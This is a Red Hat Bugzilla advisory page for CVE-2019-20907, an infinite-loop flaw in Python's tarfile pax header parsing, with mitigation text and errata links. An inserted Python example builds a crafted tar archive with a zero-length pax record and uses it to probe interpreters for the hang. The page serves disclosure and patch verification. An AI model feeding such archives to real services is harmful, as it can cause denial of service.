Bug 1856481 (CVE-2019-20907)
| Summary: | CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive | | |
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Guilherme de Almeida Suckevicz <gsuckevi> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | | |
| Version: | unspecified | CC: | adev88, bdettelb, carl, charleryals, cstratak, dmalcolm, extras-orphan, hhorak, jeffrey.ness, jorton, kevin, manisandro, m.cyprian, mhroncok, pviktori, python-maint, python-sig, rkuska, shcherbina.iryna, slavek.kabrda, steve.traylen, thrnciar, TicoTimo, tomckay, tomspur, torsava, tvainio, vstinner |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | If docs needed, set a value |
| Doc Text: | A flaw was found in python. In Lib/tarfile.py an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation. | | |
| Story Points: | --- | | |
| Clone Of: | | Environment: | |
| Last Closed: | 2020-10-19 20:21:20 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | 1856482, 1856483, 1856484, 1856485, 1856486, 1856488, 1856489, 1856490, 1856491, 1856492, 1856493, 1856536, 1856537, 1856538, 1856539, 1856540, 1856541, 1856542, 1856543, 1856544, 1856545, 1856546, 1856647, 1856648, 1856649, 1856650, 1856651, 1856652, 1882666, 1885296, 1916667, 1916668, 1916669 | | |
| Bug Blocks: | 1856487 | | |
Description
Guilherme de Almeida Suckevicz
2020-07-13 18:33:53 UTC
Created mingw-python3 tracking bugs for this issue:
Affects: fedora-all [bug 1856489]

Created python2 tracking bugs for this issue:
Affects: fedora-all [bug 1856485]

Created python26 tracking bugs for this issue:
Affects: fedora-all [bug 1856486]

Created python3 tracking bugs for this issue:
Affects: fedora-all [bug 1856488]

Created python34 tracking bugs for this issue:
Affects: epel-all [bug 1856483]
Affects: fedora-all [bug 1856491]

Created python35 tracking bugs for this issue:
Affects: fedora-all [bug 1856490]

Created python36 tracking bugs for this issue:
Affects: fedora-all [bug 1856492]

Created python37 tracking bugs for this issue:
Affects: fedora-all [bug 1856493]

Created python38 tracking bugs for this issue:
Affects: fedora-all [bug 1856484]

Created python39 tracking bugs for this issue:
Affects: fedora-all [bug 1856482]

Mitigation:

This flaw can be mitigated by not opening untrusted files with tarfile.

Statement:

A service is vulnerable if it uses python's tarfile module to open untrusted tar files. If an attacker is able to submit a crafted tar file to a service which uses the tarfile module to open it, an infinite loop will be executed, potentially causing a denial of service. The tarfile module is included with python.

Flaw summary:

In Lib/tarfile.py's _proc_pax() function, there's a `while True` loop which relies upon the value of the `pos` variable in order to exit the loop. This variable is incremented with `pos += length`, but it's possible for `length` to be 0, thus the loop will never exit. It's possible for `length` to be set to 0 because the function uses a regex to parse the record like: (length, keyword, value). The patch raises an exception if the `length` variable is 0 and adds a test.

Tomas, Joshua, is the updated summary of all the bugzillas scripted? Can the script be updated to use the *This is a minor update (do not send email)* option?
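The flaw summary above describes the `_proc_pax()` record loop and the one-line fix. The following is an added example, not code from this tracker or from CPython: it models that loop in both its pre-fix and fixed forms, builds a tar archive whose first member is a pax extended header carrying a zero-length record, and opens that archive in a child interpreter under a timeout so that a vulnerable `tarfile` cannot hang the caller. The pax payloads, the archive, the `parse_pax_records` model and the `probe_interpreter` helper are all constructed here for the demonstration; `parse_pax_records` mirrors the loop shape given in the summary rather than being the module's own code, and the probe assumes `sys.executable` is the interpreter you want to check.

```python
"""CVE-2019-20907 in miniature: a pax record whose length field is 0.

Added example (not from the Red Hat tracker or from CPython). Payloads and
the archive are constructed here for the demo.
"""
import io
import re
import subprocess
import sys
import tarfile

# A pax record is "<length> <keyword>=<value>\n", where <length> counts the
# whole record, digits and trailing newline included. Both records here are
# well formed (constructed sample data).
GOOD_PAX_DATA = b"22 path=some/file.txt\n16 size=1234567\n"

# Crafted record: length 0 means `pos += 0`, so an unpatched loop re-parses
# the same record forever (constructed sample data).
CRAFTED_PAX_DATA = b"0 x=y\n"

# Same pattern Lib/tarfile.py uses to split records.
PAX_RECORD = re.compile(br"(\d+) ([^=]+)=")


def parse_pax_records(buf, hardened=True, max_iterations=1000):
    """Model of the record loop in TarInfo._proc_pax().

    hardened=True applies the upstream fix (reject a length of 0).
    hardened=False reproduces the pre-fix loop. max_iterations exists only in
    this model so the demo terminates; the real unpatched module has no guard.
    """
    records = {}
    pos = 0
    iterations = 0
    while True:
        match = PAX_RECORD.match(buf, pos)
        if not match:
            break
        length, keyword = match.groups()
        length = int(length)
        if hardened and length == 0:
            # The upstream fix: a record can never be 0 bytes long.
            raise tarfile.InvalidHeaderError("invalid header")
        # Value sits between "=" and the record's trailing newline.
        value = buf[match.end(2) + 1:match.start(1) + length - 1]
        records[keyword.decode("utf-8")] = value.decode("utf-8")
        pos += length
        iterations += 1
        if iterations >= max_iterations:
            raise RuntimeError("record loop stuck at offset %d" % pos)
    return records


def build_crafted_archive(pax_payload=CRAFTED_PAX_DATA):
    """Minimal tar archive whose first member is a pax extended header
    (typeflag 'x') carrying pax_payload. TarInfo.tobuf is used only to emit a
    correctly checksummed 512-byte header."""
    info = tarfile.TarInfo(name="pax-header")
    info.type = tarfile.XHDTYPE
    info.size = len(pax_payload)
    header = info.tobuf(tarfile.USTAR_FORMAT)
    padding = b"\0" * (-len(pax_payload) % tarfile.BLOCKSIZE)
    end_of_archive = b"\0" * (2 * tarfile.BLOCKSIZE)
    return header + pax_payload + padding + end_of_archive


def probe_interpreter(python=sys.executable, timeout=5.0):
    """Open the crafted archive in a child interpreter with a timeout.

    Returns "vulnerable" if the child never returns (the infinite loop),
    "patched" if tarfile rejects the header with ReadError, else "unexpected".
    """
    archive_hex = build_crafted_archive().hex()
    child_code = (
        "import io, sys, tarfile\n"
        "tarfile.open(fileobj=io.BytesIO(bytes.fromhex(sys.argv[1])), mode='r:')\n"
    )
    try:
        result = subprocess.run(
            [python, "-c", child_code, archive_hex],
            capture_output=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return "vulnerable"
    if result.returncode != 0 and b"ReadError" in result.stderr:
        return "patched"
    return "unexpected"


if __name__ == "__main__":
    print("well-formed records:", parse_pax_records(GOOD_PAX_DATA))
    print("this interpreter's tarfile is", probe_interpreter())
```

Run it against each interpreter you ship (`probe_interpreter("/opt/rh/rh-python36/root/usr/bin/python3")` style paths are the kind of thing to pass in) rather than trusting version strings, since backported fixes do not change the reported version. The model's `hardened=False` path shows why the fix is a single comparison: nothing else in the loop depends on the record being non-empty, so `length == 0` is the only input that stops `pos` from advancing.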
This issue has been addressed in the following products:

Red Hat Software Collections for Red Hat Enterprise Linux 6
Red Hat Software Collections for Red Hat Enterprise Linux 7
Red Hat Software Collections for Red Hat Enterprise Linux 7.6 EUS
Red Hat Software Collections for Red Hat Enterprise Linux 7.7 EUS

Via RHSA-2020:4285 https://access.redhat.com/errata/RHSA-2020:4285

This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2019-20907

This issue has been addressed in the following products:

Red Hat Software Collections for Red Hat Enterprise Linux 7
Red Hat Software Collections for Red Hat Enterprise Linux 7.6 EUS
Red Hat Software Collections for Red Hat Enterprise Linux 7.7 EUS

Via RHSA-2020:4273 https://access.redhat.com/errata/RHSA-2020:4273

This issue has been addressed in the following products:

Red Hat Software Collections for Red Hat Enterprise Linux 7
Red Hat Software Collections for Red Hat Enterprise Linux 7.6 EUS
Red Hat Software Collections for Red Hat Enterprise Linux 7.7 EUS

Via RHSA-2020:4299 https://access.redhat.com/errata/RHSA-2020:4299

This issue has been addressed in the following products:

Red Hat Enterprise Linux 8

Via RHSA-2020:4433 https://access.redhat.com/errata/RHSA-2020:4433

This issue has been addressed in the following products:

Red Hat Enterprise Linux 8

Via RHSA-2020:4641 https://access.redhat.com/errata/RHSA-2020:4641

This issue has been addressed in the following products:

Red Hat Enterprise Linux 8

Via RHSA-2020:4654 https://access.redhat.com/errata/RHSA-2020:4654

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7

Via RHSA-2020:5009 https://access.redhat.com/errata/RHSA-2020:5009

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7

Via RHSA-2020:5010 https://access.redhat.com/errata/RHSA-2020:5010

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7.7 Extended Update Support

Via RHSA-2021:0528 https://access.redhat.com/errata/RHSA-2021:0528

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7.4 Advanced Update Support
Red Hat Enterprise Linux 7.4 Update Services for SAP Solutions
Red Hat Enterprise Linux 7.4 Telco Extended Update Support

Via RHSA-2021:0761 https://access.redhat.com/errata/RHSA-2021:0761

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7.6 Extended Update Support

Via RHSA-2021:0881 https://access.redhat.com/errata/RHSA-2021:0881